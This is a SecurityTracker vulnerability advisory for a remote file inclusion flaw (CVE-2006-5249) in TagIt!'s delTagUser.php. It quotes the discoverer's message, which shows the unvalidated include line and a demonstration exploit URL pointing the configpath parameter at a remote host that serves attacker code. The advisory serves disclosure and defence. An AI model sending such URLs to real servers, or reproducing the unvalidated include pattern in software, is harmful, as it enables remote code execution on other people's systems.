TagIt! Include File Flaw in 'delTagUser.php' Lets Remote Users Execute Arbitrary Code - SecurityTracker

Home | View Topics | Search | Contact Us |

SecurityTracker
Archives

Category: Application (Forum/Board/Portal) > TagIt!

Vendors: Schudar, Paul

TagIt! Include File Flaw in 'delTagUser.php' Lets Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1017045

SecurityTracker URL: http://securitytracker.com/id/1017045

CVE Reference: CVE-2006-5249 (Links to External Site)

Updated: Jun 2 2008

Original Entry Date: Oct 11 2006

Impact: Execution of arbitrary code via network, User access via network

Exploit Included: Yes

Version(s): 2.1.B Build 2

Description: A vulnerability was reported in TagIt!. A remote user can include and execute arbitrary code on the target system.

The 'delTagUser.php' script does not properly validate user-supplied input in the 'configpath' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/tagit2b/tagmin/delTagUser.php?configpath=http://shell/cmd.do?

k1tk4t discovered this vulnerability.

Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

Solution: No solution was available at the time of this entry.

Vendor URL: deadlysin3.net/tagit2b/ (Links to External Site)

Cause: Input validation error, State error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Message History: None.

Source Message Contents

Subject: tagit2b -- Remote File Inclusion

##################################################################################
# tagit2b -- Remote File Inclusion
# Download Source : http://codewalkers.com/codefiles/453_tagit2b.zip
#
# Found By        : k1tk4t - k1tk4t[4t]newhack.org
# Location        : Indonesia   -- #newhack[dot]org 
########################################################################
file ;
delTagUser.php
########################################################################
bugs ; 
include("$configpath/errmsg.inc.php");
########################################################################
exmple and methode exploit ;
http://localhost/tagit2b/tagmin/delTagUser.php?configpath=http://shell/cmd.do?
########################################################################
Thanks;
str0ke
milw0rm
google
#e-c-h-o (all member echo community)
#nyubi (all member solpotcrew community)
person;
y3dips, lirva32, the_day,(&all echo staff) 
evilcode,illibero,NoGe(asiahacker),
nyubi,x-ace,ghoz, home_edition2001,matdhule, iFX, and for all (friend's&enemy)

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us
This web site uses cookies for web analytics. Learn More
Copyright 2021, SecurityGlobal.net LLC